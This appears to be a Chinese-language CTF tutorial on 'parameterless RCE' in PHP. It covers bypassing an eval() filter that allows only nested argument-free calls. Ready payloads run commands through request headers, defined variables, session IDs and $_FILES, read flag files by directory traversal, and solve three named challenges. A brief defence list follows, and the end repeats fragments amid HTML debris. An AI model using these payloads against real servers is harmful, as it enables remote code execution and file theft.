无参数命令执行技术详解<\/h1>

一、无参数RCE基础概念<\/h2>
无参数命令执行(Parameterless RCE)是一种在PHP环境下，当函数调用被限制不能带参数时，仍然能够执行系统命令或读取文件的技术。<\/p>

典型环境示例<\/h3>

<?<\/span>php<\/span>
<\/span><\/span>highlight_file<\/span>(__FILE__<\/span>);
<\/span><\/span>if<\/span>(';'<\/span> ===<\/span> preg_replace<\/span>('\/[^\W]+$(?R)?$\/'<\/span>, ''<\/span>, $_GET['code'<\/span>])) {
<\/span><\/span>    eval<\/span>($_GET['code'<\/span>]);
<\/span><\/span>}
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>正则表达式分析<\/h3>
\/[^\W]+$(?R)?$\/<\/code> 解析：<\/p>

[^\W]+<\/code>：匹配字母、数字和下划线（等价于[A-Za-z0-9_]）<\/li>
$(?R)?$<\/code>：递归匹配无参数的函数调用<\/li>
整体含义：只匹配类似a(b(c()))<\/code>或a()<\/code>的格式，不匹配带参数的a("123")<\/code><\/li>
<\/ul>
二、关键函数分类<\/h2>
目录操作函数<\/h3>

getcwd()<\/code>：返回当前工作目录<\/li>
scandir()<\/code>：返回指定目录中的文件和目录数组<\/li>
dirname()<\/code>：返回路径中的目录部分<\/li>
chdir()<\/code>：改变当前目录<\/li>
<\/ul>
数组操作函数<\/h3>

end()<\/code>：指向数组最后一个元素<\/li>
next()<\/code>：指向数组下一个元素<\/li>
prev()<\/code>：指向数组上一个元素<\/li>
reset()<\/code>：指向数组第一个元素<\/li>
each()<\/code>：返回当前元素的键名和键值<\/li>
array_shift()<\/code>：删除并返回数组第一个元素<\/li>
array_reverse()<\/code>：反转数组<\/li>
array_flip()<\/code>：交换键值<\/li>
array_rand()<\/code>：随机返回键名<\/li>
<\/ul>
文件读取函数<\/h3>

show_source()<\/code> \/ highlight_file()<\/code>：语法高亮显示文件<\/li>
readfile()<\/code>：输出文件内容<\/li>
file_get_contents()<\/code>：将文件读入字符串<\/li>
readgzfile()<\/code>：读取文件（包括非gzip格式）<\/li>
<\/ul>
特殊函数<\/h3>

getenv()<\/code>：获取环境变量值（PHP7+可不带参数）<\/li>
getallheaders()<\/code> \/ apache_request_headers()<\/code>：获取HTTP请求头<\/li>
get_defined_vars()<\/code>：返回所有已定义变量<\/li>
session_start()<\/code> + session_id()<\/code>：会话控制<\/li>
localeconv()<\/code>：返回本地数字及货币格式信息<\/li>
<\/ul>
三、无参数RCE技术实现<\/h2>
1. 利用HTTP请求头<\/h3>
Payload 1:<\/strong><\/p>
GET \/1.php?code=eval(end(getallheaders()));
<\/span><\/span><\/span>HTTP\/1.1
<\/span><\/span><\/span>...
<\/span><\/span><\/span>flag: system('id');
<\/span><\/span><\/span><\/code><\/pre>Payload 2 (PHP7+):<\/strong><\/p>
GET \/1.php?exp=eval(end(apache_request_headers()));
<\/span><\/span><\/span>HTTP\/1.1
<\/span><\/span><\/span>...
<\/span><\/span><\/span>flag: system('id');
<\/span><\/span><\/span><\/code><\/pre>2. 利用全局变量<\/h3>
Payload 1:<\/strong><\/p>
?code=eval(end(current(get_defined_vars())));&flag=system('ls');
<\/code><\/pre>
Payload 2:<\/strong><\/p>
?flag=phpinfo();&code=print_r(get_defined_vars());
<\/code><\/pre>
Payload 3 (通过$_FILES):<\/strong><\/p>
import<\/span> requests
<\/span><\/span>files =<\/span> {"system('whoami');"<\/span>: ""<\/span>}
<\/span><\/span>r =<\/span> requests.<\/span>post('http:\/\/target\/1.php?code=eval(pos(pos(end(get_defined_vars()))));'<\/span>, files=<\/span>files)
<\/span><\/span>print(r.<\/span>content.<\/span>decode("utf-8"<\/span>, "ignore"<\/span>))
<\/span><\/span><\/code><\/pre>3. 利用会话控制<\/h3>
文件读取:<\/strong><\/p>
GET \/1.php?code=show_source(session_id(session_start()));
<\/span><\/span><\/span>Cookie: PHPSESSID=\/flag
<\/span><\/span><\/span><\/code><\/pre>命令执行:<\/strong><\/p>
GET \/1.php?code=eval(hex2bin(session_id(session_start())));
<\/span><\/span><\/span>Cookie: PHPSESSID=706870696e666f28293b  # phpinfo()的十六进制
<\/span><\/span><\/span><\/code><\/pre>4. 目录遍历技术<\/h3>
读取当前目录:<\/strong><\/p>
print_r<\/span>(scandir<\/span>(current<\/span>(localeconv<\/span>())));
<\/span><\/span>show_source<\/span>(end<\/span>(scandir<\/span>(getcwd<\/span>())));
<\/span><\/span>show_source<\/span>(array_rand<\/span>(array_flip<\/span>(scandir<\/span>(getcwd<\/span>()))));
<\/span><\/span><\/code><\/pre>读取上级目录:<\/strong><\/p>
print_r<\/span>(scandir<\/span>(dirname<\/span>(getcwd<\/span>())));
<\/span><\/span>show_source<\/span>(array_rand<\/span>(array_flip<\/span>(scandir<\/span>(dirname<\/span>(chdir<\/span>(dirname<\/span>(getcwd<\/span>())))))));
<\/span><\/span><\/code><\/pre>读取根目录:<\/strong><\/p>
print_r<\/span>(scandir<\/span>(chr<\/span>(ord<\/span>(strrev<\/span>(crypt<\/span>(serialize<\/span>(array<\/span>())))))));
<\/span><\/span><\/code><\/pre>四、CTF实战案例<\/h2>
案例1: [GXYCTF2019]禁止套娃<\/h3>
限制条件:<\/strong><\/p>

过滤伪协议(data:\/\/, filter:\/\/等)<\/li>
只能使用纯小写字母的无参数函数<\/li>
过滤et|na|info|dec|bin|hex|oct|pi|log等关键字<\/li>
<\/ol>
解决方案:<\/strong><\/p>

查看目录文件:<\/li>
<\/ol>
?<\/span>exp<\/span>=<\/span>print_r<\/span>(scandir<\/span>(current<\/span>(localeconv<\/span>())));
<\/span><\/span><\/code><\/pre>
读取flag.php:<\/li>
<\/ol>
?<\/span>exp<\/span>=<\/span>highlight_file<\/span>(next<\/span>(array_reverse<\/span>(scandir<\/span>(current<\/span>(localeconv<\/span>())))));
<\/span><\/span><\/code><\/pre>案例2: [DAS]NoRCE<\/h3>
限制条件:<\/strong>

过滤了o|v|b|print|var|time|file|sqrt|path|dir|exp|pi|an|na等关键字<\/p>
解决方案:<\/strong><\/p>
?exp=die(array_shift(apache_request_headers()));
<\/span><\/span><\/span>Header: flag: whoami
<\/span><\/span><\/span><\/code><\/pre>案例3: [长安战疫]RCE_No_Para<\/h3>
限制条件:<\/strong>

过滤session|end|next|header|dir等关键字<\/p>
解决方案:<\/strong><\/p>
?flag=system('cat flag.php');&code=eval(pos(reset(get_defined_vars())));
<\/code><\/pre>
五、防御建议<\/h2>

严格限制可执行函数的白名单<\/li>
禁用危险函数如eval, system等<\/li>
对用户输入进行严格过滤<\/li>
使用最新版PHP并保持更新<\/li>
限制文件系统函数的使用<\/li>
<\/ol>
六、参考资源<\/h2>

PHP无参数函数RCE<\/a><\/li>
无参数RCE总结<\/a><\/li>
无参数命令执行详解<\/a><\/li>
<\/ol>

无参数命令执行技术详解<\/h1>

一、无参数RCE基础概念<\/h2> 无参数命令执行(Parameterless RCE)是一种在PHP环境下，当函数调用被限制不能带参数时，仍然能够执行系统命令或读取文件的技术。<\/p>

二、关键函数分类<\/h2>

三、无参数RCE技术实现<\/h2>

四、CTF实战案例<\/h2>

六、参考资源<\/h2> PHP无参数函数RCE<\/a><\/li> 无参数RCE总结<\/a><\/li> 无参数命令执行详解<\/a><\/li> <\/ol>

一、无参数RCE基础概念<\/h2>
无参数命令执行(Parameterless RCE)是一种在PHP环境下，当函数调用被限制不能带参数时，仍然能够执行系统命令或读取文件的技术。<\/p>

六、参考资源<\/h2>

PHP无参数函数RCE<\/a><\/li>
无参数RCE总结<\/a><\/li>
无参数命令执行详解<\/a><\/li> <\/ol>